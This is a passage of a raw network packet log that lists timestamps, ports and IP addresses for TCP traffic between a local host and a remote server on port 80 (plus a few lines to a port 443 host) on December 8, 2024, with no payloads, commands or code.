Dec 8, 2024 13:31:54.633810043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.633878946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.633889914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.633899927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.633927107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.634691954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.634783983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.634910107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.635021925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.635600090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.635684013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.635708094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.635811090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.636385918 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.636723042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.636944056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.637276888 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.637288094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.637406111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.638147116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.638165951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.638230085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.638230085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.638947964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.639138937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.639847994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.639858961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.639955044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.639982939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.640178919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.640661955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.640806913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.641541004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.641555071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.641603947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.641616106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.641700029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.642389059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.642575026 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.642718077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.642810106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.643270016 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.643280983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.643440962 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.644051075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.644148111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.644731045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.644854069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.644932032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.644949913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.645076036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.645782948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.645797014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.645874023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.646676064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.646687984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.646863937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.647566080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.647578955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.647855043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.648367882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.648380041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.648524046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.649439096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.649540901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.650051117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.650104046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.650114059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.650122881 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.650180101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.650180101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.650862932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.651099920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.651732922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.651743889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.651789904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.651817083 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.651871920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.652673960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.652729034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.652772903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.652873993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.676480055 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.677264929 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.677264929 CET	49855	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.677282095 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.677298069 CET	443	49855	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.761308908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.761368990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.761611938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.761635065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.761683941 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.761773109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.761868000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.762228966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.762341022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.762490988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.762691975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.762768030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.762881041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.762989044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.763052940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.763448000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.763489008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.763514996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.763758898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.764198065 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.764343023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.764424086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.764471054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.764940023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.764951944 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.765145063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.765621901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.765774965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.765794992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.766022921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.766561985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.766572952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.766650915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.767205000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.767318010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.767327070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.767385960 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.767779112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.767865896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.768136024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.768299103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.768604040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.768616915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.768821955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.769435883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.769541025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.769808054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.769882917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.770256996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.770440102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.770581961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.770721912 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.771132946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.771193981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.771222115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.771435022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.772020102 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.772116899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.772135973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.772197962 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.772964954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.773072004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.773716927 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.773727894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.773740053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.773766994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.773963928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.774573088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.774678946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.774728060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.775005102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.775599957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.775612116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.775718927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.817728996 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.817843914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.818181992 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.818212986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.818293095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.818923950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.818950891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.819015026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.819864988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.819889069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.820149899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.820194960 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.820218086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.821000099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.821039915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.821052074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.821777105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.821805000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.821875095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.822601080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.822628975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.822702885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.822890997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.823446035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.823506117 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.823560953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.823904991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.824287891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.824384928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.824414015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.824521065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.825184107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.825295925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.825320959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.825357914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.825978994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.826073885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.826093912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.826174974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.826848984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.826966047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.826975107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.827075958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.827737093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.827856064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.827981949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.828711033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.828819990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.828850031 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.828880072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.829709053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.829763889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.829792976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.830480099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.830511093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.830576897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.830611944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.830741882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.831207991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.831265926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.831294060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.831387997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.831995010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.832098961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.832129002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.832211971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.832873106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.832973003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.832998991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.833092928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.833700895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.833785057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.833820105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.833992958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.834505081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.834594011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.834619999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.834685087 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.835360050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.835465908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.835494995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.835542917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.836213112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.836366892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.836642027 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.836729050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.837061882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.837167978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.837186098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.837446928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.837932110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.838021040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.838042974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.838131905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.838776112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.838860989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.838891029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.838968992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.839612007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.839745045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.839752913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.839848042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.840612888 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.840720892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.840747118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.840832949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.841320038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.841403008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.841427088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.841511965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.842174053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.842283964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.842293978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.842386007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.843025923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.843123913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.843144894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.843291998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.843875885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.843935966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.843959093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.844104052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.844791889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.844857931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.844866037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.848104954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.951867104 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.951937914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.951970100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.952059984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.952223063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.952276945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.952682972 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.953140020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.953255892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.953265905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.953389883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.953942060 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.954037905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.954061031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.954161882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.954766989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.954881907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.954910994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.955015898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.955640078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.955780029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.955806971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.955877066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.956547976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.956635952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.956660032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.956856966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.957346916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.957396030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.957510948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.957631111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.958178043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.958298922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.958327055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.958405972 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.959044933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.959132910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.959170103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.959309101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.959948063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.960043907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.960072041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.960191011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.960803032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.960865974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.960943937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.961046934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.961615086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.961752892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.961772919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.961944103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.962457895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.962555885 CET	80	49835	185.215.113.206	192.168.2.6
